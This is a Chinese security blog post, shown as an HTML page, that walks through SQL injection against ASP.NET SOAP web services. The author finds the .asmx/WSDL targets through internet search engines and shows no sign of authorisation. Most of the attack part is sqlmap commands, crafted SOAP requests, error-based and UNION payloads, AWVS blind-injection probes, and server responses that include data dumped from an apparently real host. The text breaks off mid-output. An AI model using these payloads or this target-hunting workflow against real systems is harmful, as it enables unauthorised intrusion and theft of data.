<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="「渗透」:SQL注入新姿势:) | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2020/wsdl/inject/" />
<title> 「渗透」:SQL注入新姿势:) | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2020/wsdl/inject/"><h3 class="ctitle">「渗透」:SQL注入新姿势:)</h3></a>
            <p><csmall>May 15, 2020. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <blockquote>
  <p>由于一些机缘巧合，发现了一些SQL注入的新姿势，记录一下；</p>
</blockquote>

<p>记录就是一个简单的练手记录，感觉非常有意思；</p>
<h1 id="目标确定">目标确定</h1>
<p>在shodan、fofa上搜<code class="language-plaintext highlighter-rouge">asmx</code>，找到疑似存在wsdl注入的站，大概的是这样的：<code class="language-plaintext highlighter-rouge">http://vuln_ip:8081/WebService1.asmx?WSDL</code>，一般我们可以通过手工的方式去尝试注入，这样的站访问进去后是类似xml的文件，里面是各种与服务器交互的参数，比如登录页面的username、passwd参数，开发者们都已经配置好这些参数；
如下，这是一个参数对应的xml标签：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">s</span><span class="p">:</span><span class="nx">element</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">HelloWorldResponse</span><span class="dl">"</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">s</span><span class="p">:</span><span class="nx">complexType</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">s</span><span class="p">:</span><span class="nx">sequence</span><span class="o">&gt;</span>
<span class="o">&lt;</span><span class="nx">s</span><span class="p">:</span><span class="nx">element</span> <span class="nx">minOccurs</span><span class="o">=</span><span class="dl">"</span><span class="s2">0</span><span class="dl">"</span> <span class="nx">maxOccurs</span><span class="o">=</span><span class="dl">"</span><span class="s2">1</span><span class="dl">"</span> <span class="nx">name</span><span class="o">=</span><span class="dl">"</span><span class="s2">HelloWorldResult</span><span class="dl">"</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">s:string</span><span class="dl">"</span><span class="o">/&gt;</span>
<span class="o">&lt;</span><span class="sr">/s:sequence</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="sr">/s:complexType</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="sr">/s:element</span><span class="err">&gt;
</span></code></pre></div></div>

<h1 id="sqlmap一把梭">sqlmap一把梭</h1>

<h2 id="wsdl注入">wsdl注入</h2>
<p>我们手工的方式是构造一个SOAP对应的参数的post包发给asmx网页。post包如下：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Envelope</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/envelope/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">soap</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/wsdl/soap/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsd</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsi</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema-instance</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">m0</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENC</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/encoding/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">urn</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span><span class="o">&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Header</span><span class="o">/&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Body</span><span class="o">&gt;</span>
        <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">HelloWorldResult</span><span class="o">&gt;</span>
           <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">ins</span><span class="o">&gt;</span><span class="mi">1</span><span class="o">*&lt;</span><span class="sr">/urn:ins</span><span class="err">&gt;
</span>        <span class="o">&lt;</span><span class="sr">/urn:HelloWorldResult</span><span class="err">&gt;
</span>     <span class="o">&lt;</span><span class="sr">/SOAP-ENV:Body</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="sr">/SOAP-ENV:Envelope</span><span class="err">&gt;
</span></code></pre></div></div>
<p>大致的一个构造思路就是这样的，然后观察服务器数据库的报错情况，我们可以直接把数据post包拿过来跑：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">root</span><span class="p">@</span><span class="err">#</span><span class="p">:</span><span class="o">/</span><span class="nx">home</span><span class="o">/</span><span class="nx">tool</span><span class="o">/</span><span class="nx">sqlmap</span><span class="o">-</span><span class="nx">data</span><span class="o">/</span><span class="nx">wsdl</span><span class="o">-</span><span class="nx">inject</span><span class="err">#</span> <span class="nx">sqlmap</span> <span class="o">-</span><span class="nx">r</span> <span class="nx">net</span><span class="o">-</span><span class="nx">test1</span><span class="p">.</span><span class="nx">txt</span> <span class="o">--</span><span class="nx">batch</span>
        <span class="nx">___</span>
       <span class="nx">__H__</span>
 <span class="nx">___</span> <span class="nx">___</span><span class="p">[.]</span><span class="nx">_____</span> <span class="nx">___</span> <span class="nx">___</span>  <span class="p">{</span><span class="mf">1.2</span><span class="p">.</span><span class="mi">4</span><span class="err">#</span><span class="nx">stable</span><span class="p">}</span>
<span class="o">|</span><span class="nx">_</span> <span class="o">-|</span> <span class="p">.</span> <span class="p">[(]</span>     <span class="o">|</span> <span class="p">.</span><span class="dl">'</span><span class="s1">| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end 
user</span><span class="dl">'</span><span class="nx">s</span> <span class="nx">responsibility</span> <span class="nx">to</span> <span class="nx">obey</span> <span class="nx">all</span> <span class="nx">applicable</span> <span class="nx">local</span><span class="p">,</span> <span class="nx">state</span> <span class="nx">and</span> <span class="nx">federal</span> <span class="nx">laws</span><span class="p">.</span> <span class="nx">Developers</span> <span class="nx">assume</span> <span class="nx">no</span> <span class="nx">liability</span> <span class="nx">and</span> <span class="nx">are</span> <span class="nx">not</span> 
<span class="nx">responsible</span> <span class="k">for</span> <span class="nx">any</span> <span class="nx">misuse</span> <span class="nx">or</span> <span class="nx">damage</span> <span class="nx">caused</span> <span class="nx">by</span> <span class="k">this</span> <span class="nx">program</span>

<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">starting</span> <span class="nx">at</span> <span class="mi">11</span><span class="p">:</span><span class="mi">03</span><span class="p">:</span><span class="mi">20</span>

<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">03</span><span class="p">:</span><span class="mi">54</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">testing</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">03</span><span class="p">:</span><span class="mi">54</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">confirming</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">24</span><span class="p">]</span> <span class="p">[</span><span class="nx">CRITICAL</span><span class="p">]</span> <span class="nx">connection</span> <span class="nx">timed</span> <span class="nx">out</span> <span class="nx">to</span> <span class="nx">the</span> <span class="nx">target</span> <span class="nx">URL</span><span class="p">.</span> <span class="nx">sqlmap</span> <span class="nx">is</span> <span class="nx">going</span> <span class="nx">to</span> <span class="nx">retry</span> <span class="nx">the</span> <span class="nx">request</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">24</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">the</span> <span class="nx">back</span><span class="o">-</span><span class="nx">end</span> <span class="nx">DBMS</span> <span class="nx">is</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span>
<span class="nx">web</span> <span class="nx">server</span> <span class="nx">operating</span> <span class="nx">system</span><span class="p">:</span> <span class="nx">Windows</span> <span class="mi">2008</span> <span class="nx">R2</span> <span class="nx">or</span> <span class="mi">7</span>
<span class="nx">web</span> <span class="nx">application</span> <span class="nx">technology</span><span class="p">:</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span> <span class="mf">4.0</span><span class="p">.</span><span class="mi">30319</span><span class="p">,</span> <span class="nx">Microsoft</span> <span class="nx">IIS</span> <span class="mf">7.5</span><span class="p">,</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span>
<span class="nx">back</span><span class="o">-</span><span class="nx">end</span> <span class="nx">DBMS</span><span class="p">:</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span> <span class="mi">2008</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">24</span><span class="p">]</span> <span class="p">[</span><span class="nx">WARNING</span><span class="p">]</span> <span class="nx">HTTP</span> <span class="nx">error</span> <span class="nx">codes</span> <span class="nx">detected</span> <span class="nx">during</span> <span class="nx">run</span><span class="p">:</span>
<span class="mi">500</span> <span class="p">(</span><span class="nx">Internal</span> <span class="nx">Server</span> <span class="nb">Error</span><span class="p">)</span> <span class="o">-</span> <span class="mi">19</span> <span class="nx">times</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">24</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetched</span> <span class="nx">data</span> <span class="nx">logged</span> <span class="nx">to</span> <span class="nx">text</span> <span class="nx">files</span> <span class="nx">under</span> <span class="dl">'</span><span class="s1">/root/.sqlmap/output/underattack-host</span><span class="dl">'</span>

<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">shutting</span> <span class="nx">down</span> <span class="nx">at</span> <span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">24</span>
</code></pre></div></div>
<p>注入payload单独发出来，如下：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">---</span>
<span class="nx">Parameter</span><span class="p">:</span> <span class="nx">SOAP</span> <span class="err">#</span><span class="mi">1</span><span class="o">*</span> <span class="p">((</span><span class="nx">custom</span><span class="p">)</span> <span class="nx">POST</span><span class="p">)</span>
    <span class="nx">Type</span><span class="p">:</span> <span class="nx">error</span><span class="o">-</span><span class="nx">based</span>
    <span class="nx">Title</span><span class="p">:</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span><span class="o">/</span><span class="nx">Sybase</span> <span class="nx">AND</span> <span class="nx">error</span><span class="o">-</span><span class="nx">based</span> <span class="o">-</span> <span class="nx">WHERE</span> <span class="nx">or</span> <span class="nx">HAVING</span> <span class="nx">clause</span> <span class="p">(</span><span class="nx">IN</span><span class="p">)</span>
    <span class="nx">Payload</span><span class="p">:</span> <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Envelope</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/envelope/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">soap</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/wsdl/soap/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsd</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsi</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema-instance</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">m0</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENC</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/encoding/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">urn</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span><span class="o">&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Header</span><span class="o">/&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Body</span><span class="o">&gt;</span>
        <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">getcode</span><span class="o">&gt;</span>
           <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">ins</span><span class="o">&gt;</span><span class="mi">1</span><span class="dl">'</span><span class="s1"> AND 1597 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1597=1597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113))) AND </span><span class="dl">'</span><span class="nx">DZUD</span><span class="dl">'</span><span class="s1">=</span><span class="dl">'</span><span class="nx">DZUD</span><span class="o">&lt;</span><span class="sr">/urn:ins</span><span class="err">&gt;
</span>        <span class="o">&lt;</span><span class="sr">/urn:getcode</span><span class="err">&gt;
</span>     <span class="o">&lt;</span><span class="sr">/SOAP-ENV:Body</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="sr">/SOAP-ENV:Envelope</span><span class="err">&gt;
</span>
    <span class="nx">Type</span><span class="p">:</span> <span class="nx">UNION</span> <span class="nx">query</span>
    <span class="nx">Title</span><span class="p">:</span> <span class="nx">Generic</span> <span class="nx">UNION</span> <span class="nx">query</span> <span class="p">(</span><span class="nx">NULL</span><span class="p">)</span> <span class="o">-</span> <span class="mi">7</span> <span class="nx">columns</span>
    <span class="nx">Payload</span><span class="p">:</span> <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Envelope</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/envelope/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">soap</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/wsdl/soap/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsd</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">xsi</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://www.w3.org/1999/XMLSchema-instance</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">m0</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span>  <span class="nx">xmlns</span><span class="p">:</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENC</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://schemas.xmlsoap.org/soap/encoding/</span><span class="dl">"</span> <span class="nx">xmlns</span><span class="p">:</span><span class="nx">urn</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://tempuri.org/</span><span class="dl">"</span><span class="o">&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Header</span><span class="o">/&gt;</span>
     <span class="o">&lt;</span><span class="nx">SOAP</span><span class="o">-</span><span class="nx">ENV</span><span class="p">:</span><span class="nx">Body</span><span class="o">&gt;</span>
        <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">getcode</span><span class="o">&gt;</span>
           <span class="o">&lt;</span><span class="nx">urn</span><span class="p">:</span><span class="nx">ins</span><span class="o">&gt;</span><span class="mi">1</span><span class="dl">'</span><span class="s1"> UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(117)+CHAR(78)+CHAR(90)+CHAR(84)+CHAR(69)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(102)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(73)+CHAR(83)+CHAR(102)+CHAR(106)+CHAR(101)+CHAR(70)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(68)+CHAR(86)+CHAR(76)+CHAR(84)+CHAR(73)+CHAR(122)+CHAR(99)+CHAR(66)+CHAR(82)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(75)+CHAR(98)+CHAR(102)+CHAR(107)+CHAR(99)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- aKgd&lt;/urn:ins&gt;
        &lt;/urn:getcode&gt;
     &lt;/SOAP-ENV:Body&gt;
&lt;/SOAP-ENV:Envelope&gt;
---
</span></code></pre></div></div>
<p>我们可以偷懒一下，直接payload拿过来看看反包有什么不一样的地方~看到差别了吗。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Type: 报错注入（error-based）:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 459

&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s2">"1.0"</span> <span class="nv">encoding</span><span class="o">=</span><span class="s2">"utf-8"</span>?&gt;&lt;soap:Envelope xmlns:soap<span class="o">=</span><span class="s2">"http://schemas.xmlsoap.org/soap/envelope/"</span>xmlns:xsi<span class="o">=</span><span class="s2">"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd<span class="o">=</span><span class="s2">"http://www.w3.org/2001/XMLSchema"</span><span class="o">&gt;</span>&lt;soap:Body&gt;&lt;soap:Fault&gt;&lt;faultcode&gt;soap:Server&lt;/faultcode&gt;&lt;faultstring&gt;Server was unable to process request.---&amp;gt<span class="p">;</span>在将 varchar 值 <span class="s1">'qpbzq1qzkxq'</span> 转换成数据类型&lt;/faultstring&gt;&lt;detail/&gt;&lt;/soap:Fault&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;
<span class="o">=======================================================================================</span>
<span class="o">=======================================================================================</span>
Type: 联合查询（UNION query），输出的信息比较多，限于篇幅，放上一些数据：

HTTP/1.1 200 OK
Cache-Control: private, max-age<span class="o">=</span>0
Content-Type: text/xml<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 20111

&lt;c_me_com&gt;10005&lt;/c_me_com&gt;&lt;c_me_no&gt;14&lt;/c_me_no&gt;&lt;c_me_bt&gt;10.11.201.233&lt;/c_me_bt&gt;&lt;c_me_command&gt;0&lt;/c_me_command&gt;&lt;c_me_lenght&gt;2&lt;/c_me_lenght&gt;&lt;c_me_start&gt;2000&lt;/c_me_start&gt;&lt;c_me_lastvalue&gt;0&lt;/c_me_lastvalue&gt;&lt;c_me_maxstep&gt;50&lt;/c_me_maxstep&gt;&lt;c_me_webcode&gt;com7.db001.db001t&lt;/c_me_webcode&gt;&lt;c_me_by19&gt;0.00&lt;/c_me_by19&gt;&lt;c_me_by20&gt;1&lt;/c_me_by20&gt;&lt;c_me_lastdate4&gt;2018-08-08T05:00:24.677+08:00&lt;/c_me_lastdate4&gt;&lt;c_me_lastvalue4&gt;313&lt;/c_me_lastvalue4&gt;&lt;c_me_lastdate3&gt;2018-08-08T06:03:06.137+08:00&lt;/c_me_lastdate3&gt;&lt;c_me_lastvalue3&gt;313&lt;/c_me_lastvalue3&gt;&lt;c_me_lastdate2&gt;2018-08-08T07:05:47.173+08:00&lt;/c_me_lastdate2&gt;&lt;c_me_lastvalue2&gt;313&lt;/c_me_lastvalue2&gt;&lt;c_me_lastdate1&gt;2018-08-08T08:08:28.543+08:00&lt;/c_me_lastdate1&gt;&lt;c_me_lastvalue1&gt;313&lt;/c_me_lastvalue1&gt;&lt;c_me_lastsuredate&gt;2018-08-08T11:11:05.27+08:00&lt;/c_me_lastsuredate&gt;&lt;c_me_lastsurevalue&gt;313&lt;/c_me_lastsurevalue&gt;&lt;/d2&gt;&lt;/ds&gt;&lt;/diffgr:diffgram&gt;&lt;/getcodeResult&gt;&lt;/getcodeResponse&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;
</code></pre></div></div>

<h2 id="常规查询">常规查询：</h2>
<p>当然在平常注入的过程中，不仅仅存在上述的注入，我们更多的是常见的盲注、联合查询或者是布尔盲注、时间盲注等等；我们这里举得例子同样存在，当然也是万能的awvs跑出来的：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Discovered</span> <span class="nx">by</span> <span class="nx">Blind</span> <span class="nx">SQL</span> <span class="nx">Injection</span>
<span class="nx">URL</span> <span class="nx">encoded</span> <span class="nx">POST</span> <span class="nx">input</span> <span class="nx">ins</span> <span class="nx">was</span> <span class="kd">set</span> <span class="nx">to</span> <span class="nx">eizSls</span>
<span class="nx">查看不同输入的符号对应的true</span><span class="err">、</span><span class="nx">flase值</span><span class="err">，</span><span class="nx">单数的</span><span class="o">%</span><span class="mi">27</span><span class="nx">输入进去我们可以看到是flase</span><span class="err">，</span><span class="nx">双数输入进去则为true</span><span class="err">：</span>
<span class="mi">462</span><span class="dl">'</span><span class="s1"> =&gt; ERROR
462</span><span class="dl">''</span><span class="s1"> =&gt; OK
GwHgee</span><span class="dl">'''</span> <span class="o">=&gt;</span> <span class="nx">ERROR</span>
<span class="mi">7</span><span class="nx">Ahb38</span><span class="dl">''''</span> <span class="o">=&gt;</span> <span class="nx">OK</span>
<span class="nx">CXBMlX</span><span class="dl">'''''</span><span class="s1"> =&gt; ERROR
xgBDwt</span><span class="dl">''''''</span><span class="s1"> =&gt; OK
eizSls</span><span class="dl">'''''''</span> <span class="o">=&gt;</span> <span class="nx">ERROR</span>
</code></pre></div></div>
<p>老方法，直接SQLMAP跑~</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">POST</span> <span class="o">/</span><span class="nx">WebService1</span><span class="p">.</span><span class="nx">asmx</span><span class="o">/</span><span class="nx">getcode</span> <span class="nx">HTTP</span><span class="o">/</span><span class="mf">1.1</span>
<span class="nx">Content</span><span class="o">-</span><span class="nx">Type</span><span class="p">:</span> <span class="nx">application</span><span class="o">/</span><span class="nx">x</span><span class="o">-</span><span class="nx">www</span><span class="o">-</span><span class="nx">form</span><span class="o">-</span><span class="nx">urlencoded</span>
<span class="nx">X</span><span class="o">-</span><span class="nx">Requested</span><span class="o">-</span><span class="nx">With</span><span class="p">:</span> <span class="nx">XMLHttpRequest</span>
<span class="nx">Referer</span><span class="p">:</span> <span class="nx">http</span><span class="p">:</span><span class="c1">//vuln_ip:8081/WebService1.asmx?WSDL</span>
<span class="nx">Accept</span><span class="p">:</span> <span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">,</span><span class="nx">application</span><span class="o">/</span><span class="nx">xhtml</span><span class="o">+</span><span class="nx">xml</span><span class="p">,</span><span class="nx">application</span><span class="o">/</span><span class="nx">xml</span><span class="p">;</span><span class="nx">q</span><span class="o">=</span><span class="mf">0.9</span><span class="p">,</span><span class="o">*</span><span class="cm">/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 17
Host: vuln_ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

ins=eizSls
</span></code></pre></div></div>
<p>跑出来也是一样的效果，当然是一样的注入点，都是getcode这个功能接口跑的数据：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">POST</span> <span class="nx">parameter</span> <span class="dl">'</span><span class="s1">ins</span><span class="dl">'</span> <span class="nx">is</span> <span class="nx">vulnerable</span><span class="p">.</span> <span class="nx">Do</span> <span class="nx">you</span> <span class="nx">want</span> <span class="nx">to</span> <span class="nx">keep</span> <span class="nx">testing</span> <span class="nx">the</span> <span class="nx">others</span> <span class="p">(</span><span class="k">if</span> <span class="nx">any</span><span class="p">)?</span> <span class="p">[</span><span class="nx">y</span><span class="o">/</span><span class="nx">N</span><span class="p">]</span> <span class="nx">N</span>
<span class="nx">sqlmap</span> <span class="nx">identified</span> <span class="nx">the</span> <span class="nx">following</span> <span class="nx">injection</span> <span class="nx">point</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="kd">with</span> <span class="nx">a</span> <span class="nx">total</span> <span class="k">of</span> <span class="mi">47</span> <span class="nx">HTTP</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="nx">requests</span><span class="p">:</span>
<span class="o">---</span>
<span class="nx">Parameter</span><span class="p">:</span> <span class="nx">ins</span> <span class="p">(</span><span class="nx">POST</span><span class="p">)</span>
    <span class="nx">Type</span><span class="p">:</span> <span class="nx">error</span><span class="o">-</span><span class="nx">based</span>
